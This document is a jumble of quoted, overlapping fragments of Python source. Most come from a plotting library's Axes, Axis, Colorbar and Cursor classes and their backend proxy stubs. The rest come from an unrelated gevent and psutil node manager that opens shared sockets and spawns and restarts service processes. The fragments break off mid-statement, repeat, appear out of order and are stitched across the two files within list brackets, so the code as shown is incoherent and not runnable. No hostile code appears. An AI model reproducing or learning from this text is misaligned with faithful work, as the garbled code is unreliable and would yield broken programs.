axes = ForwardTyped(lambda:", "{self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active", "self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name =", "self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ):", "raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self):", "def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported", "limits = List(tuple) #: Is the axis direction inverted. inverted = Bool() #:", "tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is the axis", "raise RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]} do", "to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already", "to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def", "str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self,", "(self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What", "are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an", "self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known", "not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for", "axes, colorbar and their associated proxy. \"\"\" from typing import Any, Mapping, Optional,", "\"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the axes. figure", "on the axes. 
projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not", "self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to", "axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis", "is expected to provide way to draw into the axis and way to", "getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown = []", "is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def", "axes are {[pa for _, pa in missing]}.\" ) # Make sure the", "class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value =", "lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab,", "a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def", "Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for", "FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a", "them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent", "\"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes. 
axes =", "#: x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) #", "f\"specified axes are {[pa for _, pa in missing]}.\" ) # Make sure", "= Bool() #: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD", "- bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported", "{[pa for _, pa in missing]}.\" ) # Make sure the plot knows", "None, ): pass def remove_line(self, id: str) -> None: pass # FIXME Need", "Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #: Intercept", "a plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value =", "self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object", "@mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported", "which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #:", "if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\")", "# Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def", "pass # FIXME Need to define the proper API to enable zooming/panning and", "axes_set. intercept = Float() # FIXME Add connections to the proxy and a", "for the tick labels tick_labels_font = Dict(str) #: Intercept position of this axis", "add more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the", "parent axes. 
axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling", "from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict,", "add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to pass def", "are {[pa for _, pa in missing]}.\" ) # Make sure the plot", "typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum,", "Tick labels. tick_labels = List(str) #: Font used for the label label_font =", "p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for", "{ \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\",", ") # Make sure the plot knows where it is plotted. plot.axes =", "in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis", ") else: raise RuntimeError( f\"The axes used for {[lab for lab, _ in", "@mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported", "\"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in", "with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state:", "def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool):", "finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for", "#: # SHOULD NOT be edited in place. 
legends = Dict(str, str) #:", "initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for", "not exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not", "that axis be autoscaled auto_scaling = Bool() #: List of 2 tuple representing", "the tick labels tick_labels_font = Dict(str) #: Intercept position of this axis with", "def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str):", "axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove", "axis are we linked to pass def remove_cursor(self, index: int): pass def add_plot(self,", "#: Reference to the backend resolver needed to dynamically add axes _resolver =", "cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is", "colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise", "axis is expected to provide way to draw into the axis and way", "label_font = Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str)", "to use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs)", "Add connections to the proxy and a way to prevent self recursion #", "axes. axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should be", "pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported", "set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass", "composing this object. 
left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis", "ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does not exist", "#: Is the axis direction inverted. inverted = Bool() #: Label of the", "the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self):", "matplotlib an axis is expected to provide way to draw into the axis", "pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass", "c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference", "[] missing = [] for lab, pa in axes.items(): if pa not in", "discountinuous axis. limits = List(tuple) #: Is the axis direction inverted. inverted =", "Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported", "axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \"", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class", "missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for lab,", "tick_labels_font = Dict(str) #: Intercept position of this axis with the other axis", "_ in unknown]} do not \" \"correspond to any valid axes (valid axes", "remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self):", "_, pa in missing]}.\" ) # Make sure the plot knows where it", "import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported", "Any, 
Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped,", "major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool() #: #", "way to prevent self recursion # FIXME Add convenience to connect axes between", "# Make sure the plot knows where it is plotted. plot.axes = self", "the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported", "str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported", "disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def", "Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize", "plots currently displayed in the axes plots = Dict(str, BasePlot) #: Display a", "add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def", "id: str) -> None: pass # FIXME Need to define the proper API", "pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self,", "float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) ->", "axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling =", "# Distributed under the terms of the BSD license. # # The full", "in the file LICENCE, distributed with this software. 
# -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar", "id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass", "FIXME need to sync to the proxy def _resolve_figure(): from .figure import Figure", "@mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position:", "any. colorbar = Typed(Colorbar) #: Set of cursors currently active on the graph", "of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis,", "c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #:", "exist in axes {self}\") axes = plot.axes_mapping if not axes: axes = {", "axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def", "def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None):", "def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ):", "Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not", "Need to define the proper API to enable zooming/panning and modifiers # TODO", "a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in", "the axis direction inverted. 
inverted = Bool() #: Label of the axis label", "(\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in", "for {[lab for lab, _ in unknown]} do not \" \"correspond to any", "Int, List, Str from atom.api import Tuple as ATuple from atom.api import Typed", "to the proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement):", "#: Should that axis be autoscaled auto_scaling = Bool() #: List of 2", "the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id):", "of the axis label = Str() #: Tick labels. tick_labels = List(str) #:", "if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\"", "a reference to the resolver to be able to add more elements #:", "\"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib", "= List(tuple) #: Label of the axis label = Str() #: Tick labels.", "use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if", "from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single", "scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError()", "in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver)", "convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\"", "Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes. 
axes", "axes {self}\") axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\"", "id): \"\"\"Remove a plot based on its ID.\"\"\" if id not in self.plots:", "atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver", "): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis", "the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar", "raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes = plot.axes_mapping", "pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def", "is not None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\"", "plot # Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver)", "Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis", "def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass", "= Typed(Colorbar) #: Set of cursors currently active on the graph cursors =", "between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the", "\" \"correspond to any valid axes (valid axes are \" \"'left', 'right', 'top',", "which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def", "Label of the axis label = Str() #: Tick labels. 
tick_labels = List(str)", "self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes:", "= Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\"", "str) #: Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\") def", "@mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported", "int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\"", "self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def", "Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple", "and modifiers # TODO Add the ability to link axes (accross different figures", "to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported", "remove_line(self, id: str) -> None: pass # FIXME Need to define the proper", "str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def", "def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported", "the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass", "a way to prevent self recursion # FIXME Add convenience to connect axes", "we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot", "object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, 
self.bottom_axis, self.right_axis, self.top_axis): if", "for the label label_font = Dict(str) #: Font used for the tick labels", "p.initialize(resolver) #: Conserve a reference to the resolver to be able to add", "Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set", "= self self.plots[plot.id] = plot # Initialize the plot if we have a", "pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def", "the other axis in data coordinate. #: Setting this values will have an" ]
[]
[ "False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes =", "stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self)", "self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port')))", "range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class", "%s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die", "p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self):", "name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in", "six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger =", "logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env", "try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop()", "self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss,", "in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port]", "self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while", "env=None): self.cmd = cmd self.env = env self._process = None self._popen = None", "in self.processes: process.stop() def watch_processes(self): while True: for process 
in self.processes: try: status", "os import psutil import six from gevent import subprocess from six.moves import range", "= False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes", "= psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting", "self.processes = [] self.running = False self._sockets = [] self._services = [] def", "subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket", "= True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type,", "self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status", "for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start()", "super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket(", "close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def", "[] def stats(self): process_stats = [] for p in self.processes: if not p.is_running():", "c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self):", "{ 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {}", "'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class", "super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets", "[] 
for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats':", "env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p)", "from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None):", "gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running =", "class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process", "self.sockets = {} self.processes = [] self.running = False self._sockets = [] self._services", "= None self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self):", "for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP']", "except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs):", "self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def", "or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes:", "{} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs)", "six from gevent import subprocess from six.moves import range from iris.core.interfaces import Interface", "c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def", "self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for", "def stop(self): try: self._process.terminate() self._process.wait() except 
psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" %", "inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self):", "in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds", "__init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process = None self._popen", "return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args,", "except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self):", "memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator", "restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for process in", "import logging import gevent import os import psutil import six from gevent import", "self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process =", "six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name,", "self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)})", "sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for", "process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue", "'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return 
{} class Node(Interface): register_with_coordinator = False def", "env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass", "for name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host or", "{'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'),", "...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self):", "True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running:", "shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num", "cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip", "for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c", "for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running", "{})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port:", "self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate()", "'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c in", "def stats(self): process_stats = [] for p in self.processes: if not p.is_running(): continue", "in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) 
return", "name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running =", "shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s',", "self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p =", "False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host,", "**kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets = []", "on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in", "in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes)", "= cmd self.env = env self._process = None self._popen = None def is_running(self):", "logging import gevent import os import psutil import six from gevent import subprocess", "cmd, env=None): self.cmd = cmd self.env = env self._process = None self._popen =", "not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def", "process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for", "class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets", "self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '), env=env)", "process.stop() def watch_processes(self): while True: for process in self.processes: try: status = process._process.status", "None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = 
subprocess.Popen( self.cmd,", "= env self._process = None self._popen = None def is_running(self): return self._process and", "name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip,", "from gevent import subprocess from six.moves import range from iris.core.interfaces import Interface from", "**kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False", "= [] def stats(self): process_stats = [] for p in self.processes: if not", "p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances',", "os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in", "if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running: process.restart() gevent.sleep(1)", "= None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen(", "__init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running", "iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def", "import subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import", "= [] for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd,", "process in self.processes: process.stop() def watch_processes(self): while True: for process in self.processes: try:", "self.env = env self._process = None self._popen = None def is_running(self): return self._process", "register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {}", "= Process(cmd.split(' '), 
env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting", "p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running", "json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services:", "for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env =", "self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop()", "gevent import os import psutil import six from gevent import subprocess from six.moves", "num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS']", "= sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True:", "in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if", "process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if", "env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split('", "env self._process = None self._popen = None def is_running(self): return self._process and self._process.is_running()", "= [] self._services = [] def stats(self): process_stats = [] for p in", "try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0),", "def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process = None", "self._services = [] def stats(self): process_stats = [] for p in self.processes: if", "= False self._sockets 
